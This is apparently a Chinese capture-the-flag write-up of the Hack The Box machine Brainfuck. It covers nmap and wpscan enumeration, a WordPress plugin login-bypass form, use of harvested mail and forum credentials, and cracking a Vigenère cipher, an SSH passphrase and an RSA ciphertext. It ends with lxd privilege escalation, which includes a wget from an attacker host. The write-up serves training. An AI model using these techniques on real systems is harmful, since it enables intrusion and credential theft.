基本信息

端口扫描

22,25,110,143,443,ssl证书里得到子域名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ nmap -sC -sV 10.10.10.17
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-25 13:56 CST
Nmap scan report for 10.10.10.17
Host is up (0.069s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL USER SASL(PLAIN) TOP CAPA RESP-CODES AUTH-RESP-CODE
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: capabilities OK listed LOGIN-REFERRALS SASL-IR AUTH=PLAINA0001 have LITERAL+ post-login Pre-login more IMAP4rev1 ID IDLE ENABLE
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.99 seconds

443

直接访问是nginx默认页面:

那就是加hosts:

1
10.10.10.17 sup3rs3cr3t.brainfuck.htb www.brainfuck.htb brainfuck.htb

brainfuck.htb

是一个wordpress, 给出一个邮箱地址,并且说明使用了SMTP,前面也有SMTP相关端口开放:

sup3rs3cr3t.brainfuck.htb

sup3rs3cr3t.brainfuck.htb看起来是一个论坛,有注册登录,先放着:

Wordpress

wpscan

因为是wordpress,那就直接wpscan,发现一个老版本插件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
wpscan --url https://brainfuck.htb --disable-tls-checks

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

这个插件存在可利用漏洞:

login

就是利用这个插件的逻辑漏洞,登录任意用户,administrator没什么用,登录admin进行后续操作:

smtp password

在seting -> easy wp smtp里可以看到smtp配置信息。密码隐藏的直接调一下就可以看到:

1
orestis : kHGuERB29DNiNE

ticket.html

1
2
3
4
5
6
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="admin">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

SMTP

enum

直接使用得到的用户名密码从SMTP获取信息。得到两封邮件内容,其中包括secret forum的用户名密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
$ ncat 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
LIST
+OK 2 messages:
1 977
2 514
.
RETR 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
	id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8

Your new WordPress site has been successfully set up at:

https://brainfuck.htb

You can log in to the administrator account with the following information:

Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php

We hope you enjoy your new site. Thanks!

--The WordPress Team
https://wordpress.org/
.
RETR 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
	id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)

Hi there, your credentials for our "secret" forum are below :)

username: orestis
password: kIEnnfEKJ#9UmdO

Regards
.

sup3rs3cr3t.brainfuck.htb

回到前面的论坛,使用得到的账号密码登录:

ssh access里orestis说他的账号锁了,让管理员把key给他,key里是加密通讯:

vigenere

注意orestis的签名信息,两篇帖子对应关系,以及url格式:

1
2
3
4
5
6
Orestis - Hacking for fun and profit
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr 可能是一个URL
mnvze:// -> https://
sp_ptr -> id_rsa

加密方式是vigenere

解出来ssh key下载地址:

1
https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

ssh key

下载下来并不能直接使用,还需要密码,直接john破解出来密码:

1
2
3
4
5
6
wget https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa --no-check-certificate
chmod 600 id_rsa
python /usr/share/john/ssh2john.py id_rsa > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

3poulakia!

user flag

然后直接ssh登录,用户目录得到user.txt:

提权信息

提权有不同的方式,预期是密码学,也可以lxd非预期打

lxd

当前用户在lxd组中,利用方式:

1
2
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)

RSA

当前用户目录还有几个文件,简单看一下可以知道是RSA:

debug.txt

1
2
3
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

encrypt.sage

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))

p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)



c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

output.txt

1
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

RSA Decrypt get root flag

基础RSA,debug里给出了p,q,e:

solve.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
def egcd(a, b):
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
        gcd = b
    return gcd, x, y

def main():

    p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
    q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
    e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
    ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

    # compute n
    n = p * q

    # Compute phi(n)
    phi = (p - 1) * (q - 1)

    # Compute modular inverse of e
    gcd, a, b = egcd(e, phi)
    d = a

    print( "n:  " + str(d) );

    # Decrypt ciphertext
    pt = pow(ct, d, n)
    print( "pt: " + str(pt) )
    print( "root.txt: " + format(pt,'x').decode('hex') )
    
if __name__ == "__main__":
    main()

lxd to root

这个跟之前做过的Tabby一样:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 本地build
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine

# 靶机操作
wget 10.10.14.4:7777/alpine-v3.12-x86_64-20200710_2021.tar.gz
lxc image import ./alpine-v3.12-x86_64-20200710_2021.tar.gz --alias miao
lxc image list

# 这一步如果No storage pool found的话,先
# lxd init 一路默认即可
lxc init miao miaoaaaa -c security.privileged=true
lxc config device add miaoaaaa mydevice disk source=/ path=/mnt/root recursive=true
lxc start miaoaaaa
lxc exec miaoaaaa /bin/sh
cd /mnt/root/root

参考资料